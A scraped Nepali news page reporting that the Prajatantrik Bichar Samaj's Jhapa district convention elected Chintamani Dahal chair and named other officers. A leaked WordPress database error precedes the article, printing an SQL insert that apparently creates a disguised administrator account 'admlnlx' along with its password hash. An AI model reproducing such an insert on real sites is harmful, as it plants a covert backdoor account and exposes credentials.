WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2BvRnqfKnF5VCOtLJXpsoz/Jto0t5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 02:32:18', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रजातान्त्रिक विचार समाजको झापा जिल्ला अध्यक्षमा चिन्तामणि दाहाल चयन हुनुभएको छ । समाजको बुधबार सम्पन्न तेस्रो अधिवेशनले उपाध्यक्षमा नारायणप्रसाद पौडेल, सचिवमा भरत प्रसाईँ, सहसचिवमा धनकुमारी खरेल र कोषाध्यक्षमा मन्जु सिटौला पोखरेल लाई सर्वसम्मतरूपमा चयन गरेको हो ।
यसैगरी सदस्यमा केशव काफ्ले, बडाराम हेमरम, सन्तोष प्रसाईँ, यज्ञलक्ष्मी चौलागाईँ, राजेन्द्र दाहाल, देवीप्रसाद आचार्य, प्रकाश भण्डारी, गणेश गिरी, ज्ञानेन्द्र निरौला र शम्भु थापामगर पनि सर्वसम्मत चुनिनु भएको छ । समाजको आगामी भदौ २३ र २४ गते विराटनगरमा केन्द्रीय अधिवेशन हुने जनाएको छ । रासस